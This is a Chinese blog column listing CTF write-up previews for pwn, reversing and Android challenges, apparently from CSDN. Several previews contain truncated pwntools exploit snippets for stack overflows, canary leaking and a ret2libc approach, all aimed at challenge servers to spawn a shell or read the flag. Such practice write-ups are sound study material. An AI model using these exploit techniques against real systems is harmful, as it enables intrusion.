CTF
3nc0de
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
Jarvis OJ-PWN
pwnTest_Your_MemoryTest_Your_Memory题目名字和题目没啥关系,真·一点关系也没有。提供了system()函数并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。from pwn import *r=remote('pwn2.jarvisoj.com',9876)e=ELF('./memory')sys_a原创 2020-08-08 17:36:16 · 325 阅读 · 0 评论 -
攻防世界进阶区pwn1
拿到题目checksec一下,发现开了canary保护。分析源程序,也很容易找到溢出点,题目开了canary,很显然v6就是canary,s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单,输入1进行read操作,2进行puts,3退出。那么思路就很清楚了,通过read填充0x88个a,然后通过puts打印,因为puts碰到\x00才会停止打印,那么就会有疑惑了,众所周知canary的最后一个字节为\x00,那打印0x88个’a’之后不是直接停止打印了吗?后来用gdb看了一下发现cana原创 2020-06-06 10:53:23 · 389 阅读 · 0 评论 -
BUUCTF-PWN刷题日记(二)
BUUCTF-PWN刷题日记ciscn_2019_n_8not_the_same_3dsctf_2016ciscn_2019_n_8送分题…'''Author:3nc0deDate:2020/05/15'''from pwn import *r = process('./pwn')#r = remote('node3.buuoj.cn', port)payload=p32(0x11)*14r.sendline(payload)r.interactive()not_the原创 2020-05-15 11:11:27 · 381 阅读 · 0 评论 -
攻防世界PWN进阶区pwn100/pwn200/warmup
攻防世界PWN进阶区pwn200pwn100pwn200和CTFWIKI上的ret2libc3大同小异。条件:1.有read(),write()函数,无system。2.在函数sub_8048484中存在栈溢出。思路:1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞2.通过LibcSearcher获取libc版本3.获取system函数,”/bi原创 2020-05-12 15:58:17 · 712 阅读 · 1 评论 -
BUUCTF-PWN刷题日记(一)
BUUCTF-PWN刷题日记riprip简单的栈溢出#coding=utf-8from pwn import*#r = process('./pwn1')r = remote('node3.buuoj.cn',26123)sys_addr = 0x401186#address of funpayload = 'a'*(0xf+8) + p64(sys_addr)r.sendli...原创 2020-04-30 22:44:22 · 1628 阅读 · 0 评论 -
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3Webcheck in修改maxlength,删除按钮的d...原创 2020-03-30 19:57:40 · 3846 阅读 · 0 评论 -
攻防世界PWN新手区WP
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新get shellnc + 地址直接连接cat flagwhen did you born运行一遍,报错,段错误,栈溢出拖进IDA可以观察到当v5==1926的时候就会cat flag但是当v5 == 1926 的时候又会报错观察到这里还有一个v4而且是栈溢出的点不妨点进去...原创 2020-02-23 00:27:25 · 2001 阅读 · 0 评论 -
攻防世界Android新手区部分WP(持续更)
攻防世界AndroidAPP1easy-apk待更APP1作为一名安卓逆向小萌新,上来先走一波模拟器,发现这题和之前做的Windows逆向某些题目差不多——输入flag验证是否正确。既然是逆向,接下来就要想办法得到他的源码,类似于ida,这里安卓用到安卓逆向工具JEB。用JEB打开后,查看MainActicity,(类似于IDA找main函数)阅读这一段代码,可以得知我们输入的字符...原创 2020-02-22 14:50:58 · 421 阅读 · 0 评论 -
攻防世界RE新手区部分WP(持续更)
攻防世界REinsanityopen-sourcesimple-unpacklogmein待更新insanity对新手及其又好的送分题1.拖进IDA2.Shift+F123.Ctrl+F输入flag得到flag9447{This_is_a_flag}open-source#include <stdio.h>#include <string.h>int...原创 2020-01-13 20:22:00 · 747 阅读 · 0 评论
分享